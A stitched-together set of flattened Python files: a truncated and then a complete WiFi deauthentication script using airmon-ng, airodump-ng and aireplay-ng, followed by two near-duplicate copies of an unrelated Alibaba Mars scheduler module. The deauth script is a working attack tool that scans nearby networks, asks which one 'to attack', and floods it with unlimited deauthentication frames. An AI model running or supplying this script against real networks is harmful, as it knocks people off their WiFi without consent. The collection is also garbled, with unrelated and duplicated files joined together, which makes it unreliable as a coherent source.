command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. # Killing all conflicting processes using airmon-ng kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) # Put wireless in Monitor mode print("Putting Wifi adapter into monitored mode:") put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) # subprocess.Popen(<list of command line arguments goes here>) # The Popen method opens a pipe from a command. # The output is an open file that can be accessed by other programs. # We run the iwconfig command to look for wireless interfaces. # Discover access points discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. try: while True: # We want to clear the screen before we print the network interfaces. subprocess.call("clear", shell=True) for file_name in os.listdir(): # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. # The following list contains the field names for the csv entries. fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] if ".csv" in file_name: with open(file_name) as csv_h: # This will run multiple times and we need to reset the cursor to the beginning of the file. csv_h.seek(0) # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. # This creates a list of dictionaries with the keys as specified in the fieldnames. csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) for row in csv_reader: # We want to exclude the row with BSSID. if row["BSSID"] == "BSSID": pass # We are not interested in the client data. elif row["BSSID"] == "Station MAC": break # Every field where an ESSID is specified will be added to the list. elif check_for_essid(row["ESSID"], active_wireless_networks): active_wireless_networks.append(row) print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") print("No |\tBSSID |\tChannel|\tESSID |") print("___|\t___________________|\t_______|\t______________________________|") for index, item in enumerate(active_wireless_networks): # We're using the print statement with an f-string. # F-strings are a more intuitive way to include variables when printing strings, # rather than ugly concatenations. print(f"{index}\t{item["BSSID"]}\t{item["channel"].strip()}\t\t{item["ESSID"]}") # We make the script sleep for 1 second before loading the updated list. time.sleep(1) except KeyboardInterrupt: print("\nReady to make choice.") # Ensure that the input choice is valid. while True: # If you don't make a choice from the options available in the list, # you will be asked to please try again. choice = input("Please select a choice from above: ") try: if active_wireless_networks[int(choice)]: break except: print("Please try again.") # To make it easier to work with and read the code, we assign the results to variables. hackbssid = active_wireless_networks[int(choice)]["BSSID"] hackchannel = active_wireless_networks[int(choice)]["channel"].strip() # Change to the channel we want to perform the DOS attack on. # Monitoring takes place on a different channel and we need to set it to that channel. subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) # Deauthenticate clients using a subprocess. # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"]) # User will need to use control-c to break the script.
# We will be using the subprocess module to run commands on Kali Linux. import subprocess # We require regular expressions. import re # We want to open the CSV files generated by airmon-ng, # and we'll use the built-in csv module. import csv # We want to import os because we want to check for sudo import os # We want to use time.sleep() import time # We want to move .csv files in the folder if we found any. # We'll use shutil for that. import shutil # Create a timestamp for .csv filename from datetime import datetime # Create an empty list active_wireless_networks = [] # We use this function to test if the ESSID is already in the list file. # If so we return False so we don't add it again. # If it is not in the lst we return True which will instruct the elif # statement to add it to the lst. def check_for_essid(essid, lst): check_status = True # If no ESSIDs in list add the row if len(lst) == 0: return check_status # This will only run if there are wireless access points in the list. for item in lst: # If True don't add to list. False will add it to list if essid in item["ESSID"]: check_status = False return check_status # Basic user interface header print(r"""______ _ _ ______ _ _ | _ \ (_) | | | ___ \ | | | | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") print("\n****************************************************************") print("\n* Copyright of David Bombal, 2021 *") print("\n* https://www.davidbombal.com *") print("\n* https://www.youtube.com/davidbombal *") print("\n****************************************************************") # If the user doesn't run the program with super user privileges, don't allow them to continue. if not 'SUDO_UID' in os.environ.keys(): print("Try running this program with sudo.") exit() # Remove .csv files before running the script. for file_name in os.listdir(): # We should only have one csv file as we delete them from the folder # every time we run the program. if ".csv" in file_name: print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") # We get the current working directory. directory = os.getcwd() try: # We make a new directory called /backup os.mkdir(directory + "/backup/") except: print("Backup folder exists.") # Create a timestamp timestamp = datetime.now() # We move any .csv files in the folder to the backup folder. shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. wlan_pattern = re.compile("^wlan[0-9]+") # Python allows is to run system commands by using a function provided by the subprocess module. # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) # No WiFi Adapter connected. if len(check_wifi_result) == 0: print("Please connect a WiFi adapter and try again.") exit() # Menu to select WiFi interface from print("The following WiFi interfaces are available:") for index, item in enumerate(check_wifi_result): print(f"{index} - {item}") # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. while True: wifi_interface_choice = input("Please select the interface you want to use for the attack: ") try: if check_wifi_result[int(wifi_interface_choice)]: break except: print("Please enter a number that corresponds with the choices available.") # For easy reference we call the selected interface hacknic hacknic = check_wifi_result[int(wifi_interface_choice)] # Tell the user we're going to kill the conflicting processes. print("WiFi adapter connected!\nNow let's kill conflicting processes:") # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. # Killing all conflicting processes using airmon-ng kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"]) # Put wireless in Monitor mode print("Putting Wifi adapter into monitored mode:") put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic]) # subprocess.Popen(<list of command line arguments goes here>) # The Popen method opens a pipe from a command. # The output is an open file that can be accessed by other programs. # We run the iwconfig command to look for wireless interfaces. # Discover access points discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. try: while True: # We want to clear the screen before we print the network interfaces. subprocess.call("clear", shell=True) for file_name in os.listdir(): # We should only have one csv file as we backup all previous csv files from the folder every time we run the program. # The following list contains the field names for the csv entries. fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key'] if ".csv" in file_name: with open(file_name) as csv_h: # This will run multiple times and we need to reset the cursor to the beginning of the file. csv_h.seek(0) # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. # This creates a list of dictionaries with the keys as specified in the fieldnames. csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames) for row in csv_reader: # We want to exclude the row with BSSID. if row["BSSID"] == "BSSID": pass # We are not interested in the client data. elif row["BSSID"] == "Station MAC": break # Every field where an ESSID is specified will be added to the list. elif check_for_essid(row["ESSID"], active_wireless_networks): active_wireless_networks.append(row) print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") print("No |\tBSSID |\tChannel|\tESSID |") print("___|\t___________________|\t_______|\t______________________________|") for index, item in enumerate(active_wireless_networks): # We're using the print statement with an f-string. # F-strings are a more intuitive way to include variables when printing strings, # rather than ugly concatenations. print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") # We make the script sleep for 1 second before loading the updated list. time.sleep(1) except KeyboardInterrupt: print("\nReady to make choice.") # Ensure that the input choice is valid. while True: # If you don't make a choice from the options available in the list, # you will be asked to please try again. choice = input("Please select a choice from above: ") try: if active_wireless_networks[int(choice)]: break except: print("Please try again.") # To make it easier to work with and read the code, we assign the results to variables. hackbssid = active_wireless_networks[int(choice)]["BSSID"] hackchannel = active_wireless_networks[int(choice)]["channel"].strip() # Change to the channel we want to perform the DOS attack on. # Monitoring takes place on a different channel and we need to set it to that channel. subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel]) # Deauthenticate clients using a subprocess. # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"]) # User will need to use control-c to break the script.
# Copyright 1999-2020 Alibaba Group Holding Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import heapq import logging import os import random import sys import time from collections import defaultdict from .. import promise from ..config import options from ..errors import DependencyMissing from ..utils import log_unhandled from .operands import BaseOperandActor from .resource import ResourceActor from .utils import SchedulerActor logger = logging.getLogger(__name__) class ChunkPriorityItem(object): """ Class providing an order for operands for assignment """ def __init__(self, session_id, op_key, op_info, callback): self._op_key = op_key self._session_id = session_id self._op_info = op_info self._target_worker = op_info.get('target_worker') self._callback = callback self._priority = () self.update_priority(op_info['optimize']) def update_priority(self, priority_data, copyobj=False): obj = self if copyobj: obj = copy.deepcopy(obj) priorities = [] priorities.extend([ priority_data.get('depth', 0), priority_data.get('demand_depths', ()), -priority_data.get('successor_size', 0), -priority_data.get('placement_order', 0), priority_data.get('descendant_size'), ]) obj._priority = tuple(priorities) return obj @property def session_id(self): return self._session_id @property def op_key(self): return self._op_key @property def target_worker(self): return self._target_worker @target_worker.setter def target_worker(self, value): self._target_worker = value @property def callback(self): return self._callback @property def op_info(self): return self._op_info def __repr__(self): return f'<ChunkPriorityItem({self.op_key}({self.op_info['op_name']}))>' def __lt__(self, other): return self._priority > other._priority class AssignerActor(SchedulerActor): """ Actor handling worker assignment requests from operands. Note that this actor does not assign workers itself. """ @staticmethod def gen_uid(session_id): return f's:h1:assigner${session_id}' def __init__(self): super().__init__() self._requests = dict() self._req_heap = [] self._cluster_info_ref = None self._actual_ref = None self._resource_ref = None self._worker_metrics = None # since worker metrics does not change frequently, we update it # only when it is out of date self._worker_metric_time = 0 self._allocate_requests = [] def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() # the ref of the actor actually handling assignment work session_id = self.uid.rsplit('$', 1)[-1] self._actual_ref = self.ctx.create_actor(AssignEvaluationActor, self.ref(), uid=AssignEvaluationActor.gen_uid(session_id)) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) def pre_destroy(self): self._actual_ref.destroy() self.unset_cluster_info_ref() def allocate_top_resources(self, max_allocates=None): self._allocate_requests.append(max_allocates) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) def get_allocate_requests(self): reqs = self._allocate_requests self._allocate_requests = [] return reqs def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 self._actual_ref.mark_metrics_expired(_tell=True) def _refresh_worker_metrics(self): t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t def filter_alive_workers(self, workers, refresh=False): if refresh: self._refresh_worker_metrics() return [w for w in workers if w in self._worker_metrics] if self._worker_metrics else [] def _enqueue_operand(self, session_id, op_key, op_info, callback=None): priority_item = ChunkPriorityItem(session_id, op_key, op_info, callback) if priority_item.target_worker not in self._worker_metrics: priority_item.target_worker = None self._requests[op_key] = priority_item heapq.heappush(self._req_heap, priority_item) @promise.reject_on_exception @log_unhandled def apply_for_resource(self, session_id, op_key, op_info, callback=None): """ Register resource request for an operand :param session_id: session id :param op_key: operand key :param op_info: operand information, should be a dict :param callback: promise callback, called when the resource is assigned """ self._allocate_requests.append(1) self._refresh_worker_metrics() self._enqueue_operand(session_id, op_key, op_info, callback) logger.debug('Operand %s enqueued', op_key) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) @log_unhandled def apply_for_multiple_resources(self, session_id, applications): self._allocate_requests.append(len(applications)) self._refresh_worker_metrics() logger.debug('%d operands applied for session %s', len(applications), session_id) for app in applications: op_key, op_info = app self._enqueue_operand(session_id, op_key, op_info) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True) @log_unhandled def update_priority(self, op_key, priority_data): """ Update priority data for an operand. The priority item will be pushed into priority queue again. :param op_key: operand key :param priority_data: new priority data """ if op_key not in self._requests: return obj = self._requests[op_key].update_priority(priority_data, copyobj=True) heapq.heappush(self._req_heap, obj) @log_unhandled def remove_apply(self, op_key): """ Cancel request for an operand :param op_key: operand key """ if op_key in self._requests: del self._requests[op_key] def pop_head(self): """ Pop and obtain top-priority request from queue :return: top item """ item = None while self._req_heap: item = heapq.heappop(self._req_heap) if item.op_key in self._requests: # use latest request item item = self._requests[item.op_key] break else: item = None return item def extend(self, items): """ Extend heap by an iterable object. The heap will be reheapified. :param items: priority items """ self._req_heap.extend(items) heapq.heapify(self._req_heap) class AssignEvaluationActor(SchedulerActor): """ Actor assigning operands to workers """ @classmethod def gen_uid(cls, session_id): return f's:0:{cls.__name__}${session_id}' def __init__(self, assigner_ref): super().__init__() self._worker_metrics = None self._worker_metric_time = time.time() - 2 self._cluster_info_ref = None self._assigner_ref = assigner_ref self._resource_ref = None self._session_last_assigns = dict() self._mem_usage_cache = dict() def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() self._assigner_ref = self.ctx.actor_ref(self._assigner_ref) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) self.periodical_allocate() def pre_destroy(self): self.unset_cluster_info_ref() def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 def periodical_allocate(self): self.allocate_top_resources() self.ref().periodical_allocate(_tell=True, _delay=0.5) def allocate_top_resources(self, fetch_requests=False): """ Allocate resources given the order in AssignerActor """ t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t if not self._worker_metrics: return if fetch_requests: requests = self._assigner_ref.get_allocate_requests() if not requests: return max_allocates = sys.maxsize if any(v is None for v in requests) else sum(requests) else: max_allocates = sys.maxsize unassigned = [] reject_workers = set() assigned = 0 # the assigning procedure will continue till all workers rejected # or max_allocates reached while len(reject_workers) < len(self._worker_metrics) and assigned < max_allocates: item = self._assigner_ref.pop_head() if not item: break try: alloc_ep, rejects = self._allocate_resource( item.session_id, item.op_key, item.op_info, item.target_worker, reject_workers=reject_workers) except: # noqa: E722 logger.exception('Unexpected error occurred in %s', self.uid) if item.callback: # pragma: no branch self.tell_promise(item.callback, *sys.exc_info(), _accept=False) else: self.get_actor_ref(BaseOperandActor.gen_uid(item.session_id, item.op_key)) \ .handle_unexpected_failure(*sys.exc_info(), _tell=True, _wait=False) continue # collect workers failed to assign operand to reject_workers.update(rejects) if alloc_ep: # assign successfully, we remove the application self._assigner_ref.remove_apply(item.op_key, _tell=True) self._session_last_assigns[item.session_id] = time.time() assigned += 1 else: # put the unassigned item into unassigned list to add back to the queue later unassigned.append(item) if unassigned: # put unassigned back to the queue, if any self._assigner_ref.extend(unassigned, _tell=True) if not fetch_requests: self._assigner_ref.get_allocate_requests(_tell=True, _wait=False) @log_unhandled def _allocate_resource(self, session_id, op_key, op_info, target_worker=None, reject_workers=None): """ Allocate resource for single operand :param session_id: session id :param op_key: operand key :param op_info: operand info dict :param target_worker: worker to allocate, can be None :param reject_workers: workers denied to assign to """ if target_worker not in self._worker_metrics: target_worker = None reject_workers = reject_workers or set() op_io_meta = op_info.get('io_meta', {}) try: input_metas = op_io_meta['input_data_metas'] except KeyError: input_metas = self._get_chunks_meta(session_id, op_io_meta.get('input_chunks', {})) missing_keys = [k for k, m in input_metas.items() if m is None] if missing_keys: raise DependencyMissing(f'Dependencies {missing_keys!r} missing for operand {op_key}') if target_worker is None: input_sizes = dict((k, v.chunk_size) for k, v in input_metas.items()) who_has = dict((k, meta.workers) for k, meta in input_metas.items()) candidate_workers = self._get_eps_by_worker_locality(who_has, input_sizes) else: candidate_workers = [target_worker] candidate_workers = [w for w in candidate_workers if w not in reject_workers] if not candidate_workers: return None, [] # todo make more detailed allocation plans calc_device = op_info.get('calc_device', 'cpu') try: mem_usage = self._mem_usage_cache[op_key] except KeyError: pure_dep_keys = set(op_io_meta.get('pure_dep_chunk_keys', ())) mem_usage = self._mem_usage_cache[op_key] = \ sum(v.chunk_size for k, v in input_metas.items() if k not in pure_dep_keys) if calc_device == 'cpu': alloc_dict = dict(cpu=options.scheduler.default_cpu_usage, mem_quota=mem_usage) elif calc_device == 'cuda': alloc_dict = dict(cuda=options.scheduler.default_cuda_usage, mem_quota=mem_usage) else: # pragma: no cover raise NotImplementedError(f'Calc device {calc_device} not supported') last_assign = self._session_last_assigns.get(session_id, time.time()) timeout_on_fail = time.time() - last_assign > options.scheduler.assign_timeout rejects = [] for worker_ep in candidate_workers: if self._resource_ref.allocate_resource( session_id, op_key, worker_ep, alloc_dict, log_fail=timeout_on_fail): logger.debug('Operand %s(%s) allocated to run in %s', op_key, op_info['op_name'], worker_ep) self._mem_usage_cache.pop(op_key, None) self.get_actor_ref(BaseOperandActor.gen_uid(session_id, op_key)) \ .submit_to_worker(worker_ep, input_metas, _tell=True, _wait=False) return worker_ep, rejects else: rejects.append(worker_ep) if timeout_on_fail: running_ops = sum(len(metrics.get('progress', dict()).get(str(session_id), dict())) for metrics in self._worker_metrics.values()) if running_ops == 0: raise TimeoutError(f'Assign resources to operand {op_key} timed out') else: self._session_last_assigns[session_id] = time.time() return None, rejects def _get_chunks_meta(self, session_id, keys): if not keys: return dict() return dict(zip(keys, self.chunk_meta.batch_get_chunk_meta(session_id, keys))) def _get_eps_by_worker_locality(self, chunk_workers, input_sizes): locality_data = defaultdict(lambda: 0) for k in input_sizes.keys(): if k in chunk_workers: for ep in chunk_workers[k]: locality_data[ep] += input_sizes[k] workers = list(self._worker_metrics.keys()) random.shuffle(workers) max_locality = -1 max_eps = [] for ep in workers: if locality_data[ep] > max_locality: max_locality = locality_data[ep] max_eps = [ep] elif locality_data[ep] == max_locality: max_eps.append(ep) return max_eps
# Copyright 1999-2020 Alibaba Group Holding Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import copy import heapq import logging import os import random import sys import time from collections import defaultdict from .. import promise from ..config import options from ..errors import DependencyMissing from ..utils import log_unhandled from .operands import BaseOperandActor from .resource import ResourceActor from .utils import SchedulerActor logger = logging.getLogger(__name__) class ChunkPriorityItem(object): """ Class providing an order for operands for assignment """ def __init__(self, session_id, op_key, op_info, callback): self._op_key = op_key self._session_id = session_id self._op_info = op_info self._target_worker = op_info.get('target_worker') self._callback = callback self._priority = () self.update_priority(op_info['optimize']) def update_priority(self, priority_data, copyobj=False): obj = self if copyobj: obj = copy.deepcopy(obj) priorities = [] priorities.extend([ priority_data.get('depth', 0), priority_data.get('demand_depths', ()), -priority_data.get('successor_size', 0), -priority_data.get('placement_order', 0), priority_data.get('descendant_size'), ]) obj._priority = tuple(priorities) return obj @property def session_id(self): return self._session_id @property def op_key(self): return self._op_key @property def target_worker(self): return self._target_worker @target_worker.setter def target_worker(self, value): self._target_worker = value @property def callback(self): return self._callback @property def op_info(self): return self._op_info def __repr__(self): return f'<ChunkPriorityItem({self.op_key}({self.op_info["op_name"]}))>' def __lt__(self, other): return self._priority > other._priority class AssignerActor(SchedulerActor): """ Actor handling worker assignment requests from operands. Note that this actor does not assign workers itself. """ @staticmethod def gen_uid(session_id): return f's:h1:assigner${session_id}' def __init__(self): super().__init__() self._requests = dict() self._req_heap = [] self._cluster_info_ref = None self._actual_ref = None self._resource_ref = None self._worker_metrics = None # since worker metrics does not change frequently, we update it # only when it is out of date self._worker_metric_time = 0 self._allocate_requests = [] def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() # the ref of the actor actually handling assignment work session_id = self.uid.rsplit('$', 1)[-1] self._actual_ref = self.ctx.create_actor(AssignEvaluationActor, self.ref(), uid=AssignEvaluationActor.gen_uid(session_id)) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) def pre_destroy(self): self._actual_ref.destroy() self.unset_cluster_info_ref() def allocate_top_resources(self, max_allocates=None): self._allocate_requests.append(max_allocates) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) def get_allocate_requests(self): reqs = self._allocate_requests self._allocate_requests = [] return reqs def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 self._actual_ref.mark_metrics_expired(_tell=True) def _refresh_worker_metrics(self): t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t def filter_alive_workers(self, workers, refresh=False): if refresh: self._refresh_worker_metrics() return [w for w in workers if w in self._worker_metrics] if self._worker_metrics else [] def _enqueue_operand(self, session_id, op_key, op_info, callback=None): priority_item = ChunkPriorityItem(session_id, op_key, op_info, callback) if priority_item.target_worker not in self._worker_metrics: priority_item.target_worker = None self._requests[op_key] = priority_item heapq.heappush(self._req_heap, priority_item) @promise.reject_on_exception @log_unhandled def apply_for_resource(self, session_id, op_key, op_info, callback=None): """ Register resource request for an operand :param session_id: session id :param op_key: operand key :param op_info: operand information, should be a dict :param callback: promise callback, called when the resource is assigned """ self._allocate_requests.append(1) self._refresh_worker_metrics() self._enqueue_operand(session_id, op_key, op_info, callback) logger.debug('Operand %s enqueued', op_key) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True, _wait=False) @log_unhandled def apply_for_multiple_resources(self, session_id, applications): self._allocate_requests.append(len(applications)) self._refresh_worker_metrics() logger.debug('%d operands applied for session %s', len(applications), session_id) for app in applications: op_key, op_info = app self._enqueue_operand(session_id, op_key, op_info) self._actual_ref.allocate_top_resources(fetch_requests=True, _tell=True) @log_unhandled def update_priority(self, op_key, priority_data): """ Update priority data for an operand. The priority item will be pushed into priority queue again. :param op_key: operand key :param priority_data: new priority data """ if op_key not in self._requests: return obj = self._requests[op_key].update_priority(priority_data, copyobj=True) heapq.heappush(self._req_heap, obj) @log_unhandled def remove_apply(self, op_key): """ Cancel request for an operand :param op_key: operand key """ if op_key in self._requests: del self._requests[op_key] def pop_head(self): """ Pop and obtain top-priority request from queue :return: top item """ item = None while self._req_heap: item = heapq.heappop(self._req_heap) if item.op_key in self._requests: # use latest request item item = self._requests[item.op_key] break else: item = None return item def extend(self, items): """ Extend heap by an iterable object. The heap will be reheapified. :param items: priority items """ self._req_heap.extend(items) heapq.heapify(self._req_heap) class AssignEvaluationActor(SchedulerActor): """ Actor assigning operands to workers """ @classmethod def gen_uid(cls, session_id): return f's:0:{cls.__name__}${session_id}' def __init__(self, assigner_ref): super().__init__() self._worker_metrics = None self._worker_metric_time = time.time() - 2 self._cluster_info_ref = None self._assigner_ref = assigner_ref self._resource_ref = None self._session_last_assigns = dict() self._mem_usage_cache = dict() def post_create(self): logger.debug('Actor %s running in process %d', self.uid, os.getpid()) self.set_cluster_info_ref() self._assigner_ref = self.ctx.actor_ref(self._assigner_ref) self._resource_ref = self.get_actor_ref(ResourceActor.default_uid()) self.periodical_allocate() def pre_destroy(self): self.unset_cluster_info_ref() def mark_metrics_expired(self): logger.debug('Metrics cache marked as expired.') self._worker_metric_time = 0 def periodical_allocate(self): self.allocate_top_resources() self.ref().periodical_allocate(_tell=True, _delay=0.5) def allocate_top_resources(self, fetch_requests=False): """ Allocate resources given the order in AssignerActor """ t = time.time() if self._worker_metrics is None or self._worker_metric_time + 1 < time.time(): # update worker metrics from ResourceActor self._worker_metrics = self._resource_ref.get_workers_meta() self._worker_metric_time = t if not self._worker_metrics: return if fetch_requests: requests = self._assigner_ref.get_allocate_requests() if not requests: return max_allocates = sys.maxsize if any(v is None for v in requests) else sum(requests) else: max_allocates = sys.maxsize unassigned = [] reject_workers = set() assigned = 0 # the assigning procedure will continue till all workers rejected # or max_allocates reached while len(reject_workers) < len(self._worker_metrics) and assigned < max_allocates: item = self._assigner_ref.pop_head() if not item: break try: alloc_ep, rejects = self._allocate_resource( item.session_id, item.op_key, item.op_info, item.target_worker, reject_workers=reject_workers) except: # noqa: E722 logger.exception('Unexpected error occurred in %s', self.uid) if item.callback: # pragma: no branch self.tell_promise(item.callback, *sys.exc_info(), _accept=False) else: self.get_actor_ref(BaseOperandActor.gen_uid(item.session_id, item.op_key)) \ .handle_unexpected_failure(*sys.exc_info(), _tell=True, _wait=False) continue # collect workers failed to assign operand to reject_workers.update(rejects) if alloc_ep: # assign successfully, we remove the application self._assigner_ref.remove_apply(item.op_key, _tell=True) self._session_last_assigns[item.session_id] = time.time() assigned += 1 else: # put the unassigned item into unassigned list to add back to the queue later unassigned.append(item) if unassigned: # put unassigned back to the queue, if any self._assigner_ref.extend(unassigned, _tell=True) if not fetch_requests: self._assigner_ref.get_allocate_requests(_tell=True, _wait=False) @log_unhandled def _allocate_resource(self, session_id, op_key, op_info, target_worker=None, reject_workers=None): """ Allocate resource for single operand :param session_id: session id :param op_key: operand key :param op_info: operand info dict :param target_worker: worker to allocate, can be None :param reject_workers: workers denied to assign to """ if target_worker not in self._worker_metrics: target_worker = None reject_workers = reject_workers or set() op_io_meta = op_info.get('io_meta', {}) try: input_metas = op_io_meta['input_data_metas'] except KeyError: input_metas = self._get_chunks_meta(session_id, op_io_meta.get('input_chunks', {})) missing_keys = [k for k, m in input_metas.items() if m is None] if missing_keys: raise DependencyMissing(f'Dependencies {missing_keys!r} missing for operand {op_key}') if target_worker is None: input_sizes = dict((k, v.chunk_size) for k, v in input_metas.items()) who_has = dict((k, meta.workers) for k, meta in input_metas.items()) candidate_workers = self._get_eps_by_worker_locality(who_has, input_sizes) else: candidate_workers = [target_worker] candidate_workers = [w for w in candidate_workers if w not in reject_workers] if not candidate_workers: return None, [] # todo make more detailed allocation plans calc_device = op_info.get('calc_device', 'cpu') try: mem_usage = self._mem_usage_cache[op_key] except KeyError: pure_dep_keys = set(op_io_meta.get('pure_dep_chunk_keys', ())) mem_usage = self._mem_usage_cache[op_key] = \ sum(v.chunk_size for k, v in input_metas.items() if k not in pure_dep_keys) if calc_device == 'cpu': alloc_dict = dict(cpu=options.scheduler.default_cpu_usage, mem_quota=mem_usage) elif calc_device == 'cuda': alloc_dict = dict(cuda=options.scheduler.default_cuda_usage, mem_quota=mem_usage) else: # pragma: no cover raise NotImplementedError(f'Calc device {calc_device} not supported') last_assign = self._session_last_assigns.get(session_id, time.time()) timeout_on_fail = time.time() - last_assign > options.scheduler.assign_timeout rejects = [] for worker_ep in candidate_workers: if self._resource_ref.allocate_resource( session_id, op_key, worker_ep, alloc_dict, log_fail=timeout_on_fail): logger.debug('Operand %s(%s) allocated to run in %s', op_key, op_info['op_name'], worker_ep) self._mem_usage_cache.pop(op_key, None) self.get_actor_ref(BaseOperandActor.gen_uid(session_id, op_key)) \ .submit_to_worker(worker_ep, input_metas, _tell=True, _wait=False) return worker_ep, rejects else: rejects.append(worker_ep) if timeout_on_fail: running_ops = sum(len(metrics.get('progress', dict()).get(str(session_id), dict())) for metrics in self._worker_metrics.values()) if running_ops == 0: raise TimeoutError(f'Assign resources to operand {op_key} timed out') else: self._session_last_assigns[session_id] = time.time() return None, rejects def _get_chunks_meta(self, session_id, keys): if not keys: return dict() return dict(zip(keys, self.chunk_meta.batch_get_chunk_meta(session_id, keys))) def _get_eps_by_worker_locality(self, chunk_workers, input_sizes): locality_data = defaultdict(lambda: 0) for k in input_sizes.keys(): if k in chunk_workers: for ep in chunk_workers[k]: locality_data[ep] += input_sizes[k] workers = list(self._worker_metrics.keys()) random.shuffle(workers) max_locality = -1 max_eps = [] for ep in workers: if locality_data[ep] > max_locality: max_locality = locality_data[ep] max_eps = [ep] elif locality_data[ep] == max_locality: max_eps.append(ep) return max_eps
